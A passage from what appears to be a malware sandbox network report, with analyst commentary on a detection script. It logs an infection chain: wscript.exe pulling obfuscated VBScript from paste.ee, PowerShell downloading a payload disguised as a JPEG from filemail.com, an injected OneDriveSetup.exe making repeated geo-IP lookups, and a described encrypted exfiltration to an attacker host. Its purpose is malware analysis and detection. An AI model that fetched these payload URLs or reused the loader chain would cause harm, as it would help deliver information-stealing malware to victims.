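    for sid, hits in report().items():
        print(sid, hits)
```

The chunk decoder is what turns the "1f7f" and "2000" prefixes visible in the paste.ee Data Ascii lines back into a contiguous VBScript body; because the report only prints the first bytes of each segment, the decoder deliberately returns a short final chunk instead of failing. The 1432-byte POST body to sws.swpushroller.eu is base64-looking text and the server answers "decrypted successfully", so the exfiltrated data is encrypted client-side; the session checks therefore key on process, host, method and User-Agent rather than on body content.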

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49706 | 104.21.84.67 | 443 | 7800 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:32:50 UTC | 173 | OUT | GET /d/MQJcS HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-CH
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: paste.ee
2024-11-26 08:32:51 UTC | 1232 | IN | HTTP/1.1 200 OK
    Date: Tue, 26 Nov 2024 08:32:51 GMT
    Content-Type: text/plain; charset=utf-8
    Transfer-Encoding: chunked
    Connection: close
    Cache-Control: max-age=2592000
    strict-transport-security: max-age=63072000
    x-frame-options: DENY
    x-content-type-options: nosniff
    x-xss-protection: 1; mode=block
    content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5bLP1F7iKzLA9k5rQqgfWB2PO%2FTlyUn9B5VcDuN3R7xaB1nbpJdCkcWNWZiK4foCUumnrf%2F2Z48tGW7NHIULnn9qJ8r24ouhZ%2Fn40cXYwq65OSTK645DuZBaXA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e8887bf1a5defa5-EWR
    alt-svc: h3=":443"; ma=86400
2024-11-26 08:32:51 UTC | 190 | IN | Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 39 38 33 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 36 26 72 65 63 76 5f 62 79 74 65 73 3d 37 38 37 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 34 35 37 30 38 35 26 63 77 6e 64 3d 31 38 37 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 35 66 37 31 33 35 35 37 61 39 32 63 34 65 64 64 26 74 73 3d 35 32 30 26 78 3d 30 22 0d 0a 0d 0a
    Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1983&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=787&delivery_rate=1457085&cwnd=187&unsent_bytes=0&cid=5f713557a92c4edd&ts=520&x=0"
2024-11-26 08:32:51 UTC | 1369 | IN | Data Raw: 31 66 37 66 0d 0a 0d 0a 0d 0a 4e 50 61 6b 65 6c 76 57 71 47 78 4b 67 4e 55 20 3d 20 22 69 4c 72 71 4c 4c 5a 68 4b 4a 5a 68 57 4b 4b 22 0d 0a 61 5a 51 4a 7a 55 4c 65 70 7a 69 63 73 4c 66 20 3d 20 22 62 43 49 63 47 68 66 43 69 71 5a 4c 66 7a 78 22 0d 0a 43 4b 4b 6e 4c 71 66 66 5a 6e 6f 57 4b 70 4c 20 3d 20 22 41 4a 70 4e 70 4c 67 47 6f 75 65 4c 49 66 4c 22 0d 0a 69 65 6e 62 6f 41 6d 64 6e 57 67 52 4e 75 5a 20 3d 20 22 61 63 57 62 64 63 55 63 65 4f 6b 68 43 68 6b 22 0d 0a 69 42 6c 6a 63 53 65 4c 6f 4b 57 41 71 50 66 20 3d 20 22 65 72 68 52 71 52 4c 4b 57 63 6e 6b 43 64 68 22 0d 0a 68 65 41 6f 42 69 50 4c 50 4c 50 47 69 4c 69 20 3d 20 22 49 71 57 6b 47 4c 6d 6b 69 57 55 69 6f 55 6a 22 0d 0a 0d 0a 43 47 7a 57 70 6b 75 4a 71 4f 50 70 4c 4f 4b 20 3d 20 22 68 41
    Data Ascii: 1f7fNPakelvWqGxKgNU = "iLrqLLZhKJZhWKK"aZQJzULepzicsLf = "bCIcGhfCiqZLfzx"CKKnLqffZnoWKpL = "AJpNpLgGoueLIfL"ienboAmdnWgRNuZ = "acWbdcUceOkhChk"iBljcSeLoKWAqPf = "erhRqRLKWcnkCdh"heAoBiPLPLPGiLi = "IqWkGLmkiWUioUj"CGzWpkuJqOPpLOK = "hA
2024-11-26 08:32:51 UTC | 1369 | IN | Data Raw: 47 69 57 4c 43 65 47 57 6a 47 69 70 4c 6b 41 22 0d 0a 71 55 41 4a 7a 64 4c 41 70 4c 70 61 61 4b 57 20 3d 20 22 4f 65 51 71 7a 69 70 69 49 75 57 43 6c 4c 4c 22 0d 0a 6d 63 6d 4c 4a 4b 65 6f 70 6d 73 6a 66 47 64 20 3d 20 22 67 4c 69 47 65 61 4c 4c 48 43 75 68 7a 6f 50 22 0d 0a 41 6d 61 4b 6b 6f 47 4c 41 69 4f 4e 69 4c 50 20 3d 20 22 55 65 69 50 4c 68 41 69 6a 4c 6f 43 78 6e 4e 22 0d 0a 0d 0a 63 50 63 6f 4c 74 5a 4f 62 50 4c 4c 57 4e 6f 20 3d 20 22 7a 68 70 53 68 76 4b 55 63 69 69 52 4c 55 4e 22 0d 0a 57 66 41 53 49 68 69 67 73 6f 7a 6d 70 4f 6b 20 3d 20 22 41 4b 74 74 72 4c 4c 63 47 63 4b 68 41 75 4b 22 0d 0a 6b 4c 63 55 41 6b 6d 69 57 43 65 42 47 4c 50 20 3d 20 22 78 47 6d 71 4c 4f 43 68 4c 47 63 64 43 5a 57 22 0d 0a 47 55 6d 61 63 47 57 75 78 63 57 47 63
    Data Ascii: GiWLCeGWjGipLkA"qUAJzdLApLpaaKW = "OeQqzipiIuWClLL"mcmLJKeopmsjfGd = "gLiGeaLLHCuhzoP"AmaKkoGLAiONiLP = "UeiPLhAijLoCxnN"cPcoLtZObPLLWNo = "zhpShvKUciiRLUN"WfASIhigsozmpOk = "AKttrLLcGcKhAuK"kLcUAkmiWCeBGLP = "xGmqLOChLGcdCZW"GUmacGWuxcWGc
2024-11-26 08:32:51 UTC | 1369 | IN | Data Raw: 74 71 57 70 20 3d 20 22 4b 57 7a 5a 4e 74 6b 6b 66 55 68 49 4c 6d 67 22 0d 0a 68 64 4b 53 7a 6f 6d 52 53 41 57 41 4b 65 62 20 3d 20 22 57 6f 4b 69 55 71 66 69 4f 69 57 70 69 57 62 22 0d 0a 6f 64 4f 4b 4c 57 62 64 6d 4c 57 50 4c 70 74 20 3d 20 22 50 55 4b 4c 6e 69 4c 6f 4b 55 4c 6d 4c 5a 4b 22 0d 0a 55 6b 57 75 63 5a 76 7a 4c 48 4c 68 42 74 78 20 3d 20 22 49 62 53 67 4a 4b 47 55 55 54 4c 65 43 50 4f 22 0d 0a 6a 71 69 74 4e 65 73 4f 5a 4b 61 70 4e 69 57 20 3d 20 22 7a 6a 65 55 57 43 5a 69 65 55 65 78 4b 72 53 22 0d 0a 71 50 69 65 63 62 6b 5a 69 4c 63 52 41 63 55 20 3d 20 22 57 54 57 71 64 43 66 4b 47 66 4c 4f 4e 65 71 22 0d 0a 63 6e 75 4e 6b 47 64 7a 66 67 68 4e 47 62 78 20 3d 20 22 47 6b 4c 48 67 43 66 57 4c 62 65 75 61 67 4b 22 0d 0a 0d 0a 4f 69 62 4b 4b
    Data Ascii: tqWp = "KWzZNtkkfUhILmg"hdKSzomRSAWAKeb = "WoKiUqfiOiWpiWb"odOKLWbdmLWPLpt = "PUKLniLoKULmLZK"UkWucZvzLHLhBtx = "IbSgJKGUUTLeCPO"jqitNesOZKapNiW = "zjeUWCZieUexKrS"qPiecbkZiLcRAcU = "WTWqdCfKGfLONeq"cnuNkGdzfghNGbx = "GkLHgCfWLbeuagK"OibKK
2024-11-26 08:32:51 UTC | 1369 | IN | Data Raw: 69 63 69 57 50 57 74 57 69 62 69 7a 20 3d 20 22 78 70 53 62 69 55 4c 51 7a 7a 5a 69 6f 65 6b 22 0d 0a 66 6d 69 5a 42 5a 6f 49 6c 78 64 63 52 74 69 20 3d 20 22 52 69 66 68 69 50 63 74 4e 57 55 52 69 41 63 22 0d 0a 72 69 4c 4c 4c 6e 61 49 69 4b 4c 4b 6b 52 4b 20 3d 20 22 4c 43 4c 70 63 70 66 5a 7a 67 43 64 4c 6d 69 22 0d 0a 4a 69 57 63 47 6b 4c 55 43 70 65 4f 76 4a 6f 20 3d 20 22 6f 4c 69 6e 4c 4c 57 74 4c 70 4e 4c 55 71 69 22 0d 0a 7a 6a 4c 4a 5a 6f 6f 64 41 47 4c 74 5a 6d 66 20 3d 20 22 41 6d 64 49 55 69 51 57 63 69 68 62 6f 4e 66 22 0d 0a 67 61 78 64 47 4b 50 47 4c 47 66 68 50 6c 42 20 3d 20 22 47 57 73 69 7a 4c 65 62 65 47 6d 6b 4b 78 5a 22 0d 0a 4c 47 65 66 57 4c 67 65 42 4b 4b 55 71 71 57 20 3d 20 22 57 4c 41 4c 68 65 70 6b 57 4b 4c 52 47 55 6d 22 0d
    Data Ascii: iciWPWtWibiz = "xpSbiULQzzZioek"fmiZBZoIlxdcRti = "RifhiPctNWURiAc"riLLLnaIiKLKkRK = "LCLpcpfZzgCdLmi"JiWcGkLUCpeOvJo = "oLinLLWtLpNLUqi"zjLJZoodAGLtZmf = "AmdIUiQWcihboNf"gaxdGKPGLGfhPlB = "GWsizLebeGmkKxZ"LGefWLgeBKKUqqW = "WLALhepkWKLRGUm"
2024-11-26 08:32:51 UTC | 1369 | IN | Data Raw: 22 0d 0a 52 42 52 53 63 66 5a 74 4b 64 62 6d 4c 57 52 20 3d 20 22 47 42 68 6f 6c 4f 4c 6f 62 42 47 57 65 4c 50 22 0d 0a 52 69 47 52 53 75 41 6b 4c 4c 4c 64 66 4a 74 20 3d 20 22 6d 74 54 54 51 4c 43 65 4b 57 75 6b 69 57 65 22 0d 0a 55 4c 66 63 61 74 48 66 4a 50 6e 4c 41 5a 4f 20 3d 20 22 6a 52 5a 52 47 7a 68 4c 4e 5a 69 6d 47 69 7a 22 0d 0a 0d 0a 63 4b 64 65 64 69 7a 57 68 47 70 6f 6b 6e 7a 20 3d 20 22 68 42 69 6d 7a 52 5a 7a 4c 74 70 70 4b 5a 6d 22 0d 0a 57 65 6b 47 57 64 4c 63 63 6b 6f 57 6b 63 47 20 3d 20 22 4c 69 55 78 47 74 4b 72 4a 76 70 41 63 50 55 22 0d 0a 75 55 64 66 42 75 74 4c 6b 57 4c 4e 61 57 4b 20 3d 20 22 4c 4c 4b 57 49 4f 55 65 78 47 68 4c 7a 50 70 22 0d 0a 74 69 78 7a 57 57 6f 43 6f 4e 41 6d 75 63 68 20 3d 20 22 4c 51 69 4b 4c 43 62 63 75
    Data Ascii: "RBRScfZtKdbmLWR = "GBholOLobBGWeLP"RiGRSuAkLLLdfJt = "mtTTQLCeKWukiWe"ULfcatHfJPnLAZO = "jRZRGzhLNZimGiz"cKdedizWhGpoknz = "hBimzRZzLtppKZm"WekGWdLcckoWkcG = "LiUxGtKrJvpAcPU"uUdfButLkWLNaWK = "LLKWIOUexGhLzPp"tixzWWoCoNAmuch = "LQiKLCbcu
2024-11-26 08:32:51 UTC | 1226 | IN | Data Raw: 57 6b 78 76 69 63 66 63 22 0d 0a 4c 52 76 57 70 71 66 7a 5a 49 52 6d 4c 7a 55 20 3d 20 22 6c 54 4c 6b 4b 47 57 57 52 78 4c 78 55 70 68 22 0d 0a 4f 64 6e 57 6d 4e 4b 4c 43 52 57 4b 65 6b 78 20 3d 20 22 64 55 51 55 51 6a 47 66 49 72 47 73 54 55 54 22 0d 0a 4c 55 47 6e 69 51 4e 41 4c 63 70 74 66 63 41 20 3d 20 22 57 7a 4c 4c 4c 70 4c 47 43 47 4c 43 68 7a 4b 22 0d 0a 57 4e 65 6b 47 62 6d 57 4c 75 64 69 4c 4c 4c 20 3d 20 22 55 47 63 65 61 66 74 71 6b 6e 4b 6d 55 71 69 22 0d 0a 57 4b 64 4c 6b 62 65 6a 42 43 7a 41 57 71 4c 20 3d 20 22 4c 5a 68 6d 49 4c 47 4b 69 78 4c 61 75 75 4b 22 0d 0a 57 78 63 4c 4e 67 4b 68 65 4c 47 55 68 68 69 20 3d 20 22 57 57 74 4b 47 63 5a 63 4c 78 57 51 76 6f 57 22 0d 0a 0d 0a 6b 4c 4c 50 4e 62 63 4b 4c 62 6a 7a 70 75 4b 20 3d 20 22 66
    Data Ascii: Wkxvicfc"LRvWpqfzZIRmLzU = "lTLkKGWWRxLxUph"OdnWmNKLCRWKekx = "dUQUQjGfIrGsTUT"LUGniQNALcptfcA = "WzLLLpLGCGLChzK"WNekGbmWLudiLLL = "UGceaftqknKmUqi"WKdLkbejBCzAWqL = "LZhmILGKixLauuK"WxcLNgKheLGUhhi = "WWtKGcZcLxWQvoW"kLLPNbcKLbjzpuK = "f
2024-11-26 08:32:51 UTC | 1369 | IN | Data Raw: 32 30 30 30 0d 0a 75 75 6e 71 57 69 74 62 70 6f 66 22 0d 0a 6f 78 68 57 54 78 4c 57 4b 68 4f 41 55 6d 50 20 3d 20 22 4c 6f 6d 43 55 51 4b 47 6f 49 4c 4c 41 7a 50 22 0d 0a 67 69 52 69 4b 57 70 6d 4f 63 5a 4e 42 5a 68 20 3d 20 22 71 69 6c 71 55 57 61 4e 47 55 78 71 54 57 4b 22 0d 0a 41 62 41 4c 6c 71 57 4c 7a 51 4c 55 57 5a 70 20 3d 20 22 4c 62 47 50 69 51 57 4a 47 4b 54 42 5a 4a 63 22 0d 0a 0d 0a 66 6f 43 4e 48 4e 4b 57 67 4b 69 49 75 6f 4b 20 3d 20 22 4f 4c 74 57 4c 66 43 4e 6c 74 62 68 43 57 41 22 0d 0a 64 49 4c 75 63 6d 75 66 69 65 6c 63 6d 4c 4c 20 3d 20 22 55 4c 52 69 6b 41 41 70 62 63 4c 4e 57 55 41 22 0d 0a 61 57 70 4e 63 4c 4c 6f 71 4c 41 41 68 57 6f 20 3d 20 22 6c 71 4e 4c 71 68 55 42 43 61 73 47 4b 5a 7a 22 0d 0a 42 50 76 66 55 4b 7a 69 57 6a 4b
    Data Ascii: 2000uunqWitbpof"oxhWTxLWKhOAUmP = "LomCUQKGoILLAzP"giRiKWpmOcZNBZh = "qilqUWaNGUxqTWK"AbALlqWLzQLUWZp = "LbGPiQWJGKTBZJc"foCNHNKWgKiIuoK = "OLtWLfCNltbhCWA"dILucmufielcmLL = "ULRikAApbcLNWUA"aWpNcLLoqLAAhWo = "lqNLqhUBCasGKZz"BPvfUKziWjK
2024-11-26 08:32:51 UTC | 1369 | IN | Data Raw: 50 6b 57 57 6b 6d 20 3d 20 22 70 4b 57 74 52 4c 43 5a 66 57 6c 78 4c 57 70 22 0d 0a 68 6d 75 68 5a 68 66 4c 69 4b 4b 4c 6b 52 66 20 3d 20 22 4c 62 4b 6e 62 55 55 6b 6d 66 62 65 69 6f 41 22 0d 0a 6c 4e 63 4c 7a 78 4b 4f 6a 69 42 4b 70 70 61 20 3d 20 22 6f 69 55 4c 69 63 4c 4c 43 6b 4c 70 4c 6c 70 22 0d 0a 54 4b 5a 4a 74 52 6b 5a 68 4c 4c 47 47 72 4c 20 3d 20 22 57 6f 57 6a 68 6e 70 4f 4c 69 65 65 6b 47 54 22 0d 0a 63 68 41 4b 4c 61 69 47 4b 6d 73 50 7a 5a 51 20 3d 20 22 50 62 6b 69 61 52 4c 57 6b 55 48 47 6f 4b 57 22 0d 0a 47 4e 7a 4e 4c 75 72 6d 68 4b 62 6d 50 6d 62 20 3d 20 22 6f 4c 4a 6b 70 6d 65 6c 4c 65 7a 42 65 41 4f 22 0d 0a 41 4a 55 49 6d 6b 43 6d 4c 47 66 7a 74 50 55 20 3d 20 22 6f 68 6b 6f 4c 47 50 4c 41 4c 4c 6e 57 78 4c 22 0d 0a 0d 0a 4b 49 57
    Data Ascii: PkWWkm = "pKWtRLCZfWlxLWp"hmuhZhfLiKKLkRf = "LbKnbUUkmfbeioA"lNcLzxKOjiBKppa = "oiULicLLCkLpLlp"TKZJtRkZhLLGGrL = "WoWjhnpOLieekGT"chAKLaiGKmsPzZQ = "PbkiaRLWkUHGoKW"GNzNLurmhKbmPmb = "oLJkpmelLezBeAO"AJUImkCmLGfztPU = "ohkoLGPLALLnWxL"KIW
2024-11-26 08:32:51 UTC | 1369 | IN | Data Raw: 6b 42 69 49 50 6a 78 69 7a 4b 55 6b 6f 4b 20 3d 20 22 6b 4c 65 52 65 64 47 4c 5a 57 51 4c 5a 4c 6b 22 0d 0a 6f 4e 4c 63 4c 70 6f 4c 69 57 78 55 55 69 47 20 3d 20 22 57 4c 57 47 4e 4b 57 71 4a 74 71 4c 6f 63 5a 22 0d 0a 55 6a 48 4c 66 64 47 74 70 4b 6c 57 71 7a 4c 20 3d 20 22 64 57 6b 67 47 63 57 69 74 6f 63 6d 50 4c 74 22 0d 0a 43 5a 66 69 47 57 50 4c 70 63 63 69 52 69 57 20 3d 20 22 4c 64 4b 55 78 4b 7a 52 4c 47 53 4b 66 75 4c 22 0d 0a 53 49 66 74 78 49 78 41 74 4f 41 55 63 65 62 20 3d 20 22 4c 43 57 66 4c 6c 76 4c 63 52 4c 4c 7a 4c 42 22 0d 0a 6f 4c 78 62 57 6c 61 4a 64 69 4e 57 57 6e 6b 20 3d 20 22 4c 55 49 69 78 71 4b 47 75 5a 62 66 6b 78 4f 22 0d 0a 4c 7a 6b 65 4c 6b 6b 70 57 55 57 6f 4c 65 57 20 3d 20 22 64 6d 55 70 6f 4c 70 6b 4c 69 4a 78 57 75 69
                                                                                                                                                                      Data Ascii: kBiIPjxizKUkoK = "kLeRedGLZWQLZLk"oNLcLpoLiWxUUiG = "WLWGNKWqJtqLocZ"UjHLfdGtpKlWqzL = "dWkgGcWitocmPLt"CZfiGWPLpcciRiW = "LdKUxKzRLGSKfuL"SIftxIxAtOAUceb = "LCWfLlvLcRLLzLB"oLxbWlaJdiNWWnk = "LUIixqKGuZbfkxO"LzkeLkkpWUWoLeW = "dmUpoLpkLiJxWui


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.8  49707        193.30.119.205  443               8064  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-26 08:32:56 UTC  211                OUT        GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1
                                                       Host: 3105.filemail.com
                                                       Connection: Keep-Alive
2024-11-26 08:32:57 UTC  328                IN         HTTP/1.1 200 OK
                                                       Content-Length: 2230233
                                                       Content-Type: image/jpeg
                                                       Last-Modified: Mon, 25 Nov 2024 10:41:01 GMT
                                                       Accept-Ranges: bytes
                                                       ETag: 67ad55be8fbd7389b2f5ef2b123a44b4
                                                       X-Transfer-ID: ibybhsntnwgamsn
                                                       Content-Disposition: attachment; filename=new_imagem-vbs.jpg
                                                       Date: Tue, 26 Nov 2024 08:32:56 GMT
                                                       Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.8  49713        172.67.177.134  443               7588  C:\Windows\SysWOW64\OneDriveSetup.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-26 08:33:23 UTC  84                 OUT        GET /xml/8.46.123.75 HTTP/1.1
                                                       Host: reallyfreegeoip.org
                                                       Connection: Keep-Alive
2024-11-26 08:33:23 UTC  853                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 26 Nov 2024 08:33:23 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 361
                                                       Connection: close
                                                       Cache-Control: max-age=31536000
                                                       CF-Cache-Status: HIT
                                                       Age: 573912
                                                       Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                       Accept-Ranges: bytes
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DJrj%2BMSFf6AnTGFTcEZ8g2G963fS3oxZ5Fb5GX3kL5AgiP5iXeVxHjGWdNbKl1zJIpekm3XMKUcS05WTai9AMDUABDAavcM6j8pCOld1g%2FfA%2Fc6Hq92%2B4exwM0RUg63vQbwNubgC"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 8e888888ec1d80d9-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=1482&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1933774&cwnd=252&unsent_bytes=0&cid=c82d45225ec9d8ba&ts=471&x=0"
2024-11-26 08:33:23 UTC  361                IN         Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.8  49714        172.67.177.134  443               7588  C:\Windows\SysWOW64\OneDriveSetup.exe

Timestamp                Bytes transferred  Direction  Data
2024-11-26 08:33:25 UTC  60                 OUT        GET /xml/8.46.123.75 HTTP/1.1
                                                       Host: reallyfreegeoip.org
2024-11-26 08:33:25 UTC  851                IN         HTTP/1.1 200 OK
                                                       Date: Tue, 26 Nov 2024 08:33:25 GMT
                                                       Content-Type: text/xml
                                                       Content-Length: 361
                                                       Connection: close
                                                       Cache-Control: max-age=31536000
                                                       CF-Cache-Status: HIT
                                                       Age: 573914
                                                       Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                       Accept-Ranges: bytes
                                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MHrpi09GclgJh1XQqKVb0lAV%2BxzHUzSxho7q2onoJ9mJeGUMxi3Zj2tkeY9pNFrqltr%2FnuMLavh0SJ1mkuF88agzaFrW6jnK%2Ft4lAQZlWHqGca0PH6MhOWr5HOgnVESGiYuOcUVv"}],"group":"cf-nel","max_age":604800}
                                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                       Server: cloudflare
                                                       CF-RAY: 8e8888967eb95e6e-EWR
                                                       alt-svc: h3=":443"; ma=86400
                                                       server-timing: cfL4;desc="?proto=TCP&rtt=2082&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1397797&cwnd=233&unsent_bytes=0&cid=84c8b2565c677693&ts=464&x=0"
2024-11-26 08:33:25 UTC  361                IN         Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49716 | 172.67.177.134 | 443 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:33:28 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-26 08:33:28 UTC | 853 | IN | HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 08:33:28 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 573917
Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FyIO44aieynfAaqDEmbkjXEO3nRWwTCNSAkYbfiwSQ3CuL7U0cQCwqNxNNL8%2Bwcy2l4XmJY7%2B1C7%2By78IH2zm%2F8sThfuGT28hXHajLJogOezekmDwjEtokwRZJYcfhzZ0M5sDnhZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e8888aa295a42e6-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1729&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1638608&cwnd=201&unsent_bytes=0&cid=6105c140d962c8f5&ts=450&x=0"
2024-11-26 08:33:28 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49718 | 172.67.177.134 | 443 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:33:31 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-26 08:33:31 UTC | 849 | IN | HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 08:33:31 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 573920
Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3N6NATHGYfQN8zAItwqmUCbp4StlSCqQasyBQ8yjcVAowiTPL4mzYPHlQelzeSxFF%2Bd0jZybNQ8wdLaX5zEQRg3XUwbYdmCTtMcpEps%2BTDO93RyibYhKJPR8olOZ8PeEcgS66uPG"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e8888bdc9e2438b-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1563&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1851616&cwnd=169&unsent_bytes=0&cid=28fadc946e4db3c0&ts=451&x=0"
2024-11-26 08:33:31 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49720 | 172.67.177.134 | 443 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:33:34 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-26 08:33:35 UTC | 851 | IN | HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 08:33:34 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 573923
Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6%2Bqp2gtVHmrCqGoe8pV2YVKWC%2BhNPAmKmjo3BmtKPrdhsPplVG5Bk0hyhPg7Ssrs8JyAhHLR6LuxExglkKIQyaZ7J7DrXDvcm0rtMVALyDKhonYZXSa2P1%2FUSJrD8AY9TII3shoi"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e8888d17ab1238a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2022&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1424390&cwnd=161&unsent_bytes=0&cid=8219b6150cb87b0e&ts=470&x=0"
2024-11-26 08:33:35 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.8 | 49722 | 172.67.177.134 | 443 | 7588 | C:\Windows\SysWOW64\OneDriveSetup.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:33:37 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-26 08:33:38 UTC | 851 | IN | HTTP/1.1 200 OK
Date: Tue, 26 Nov 2024 08:33:38 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
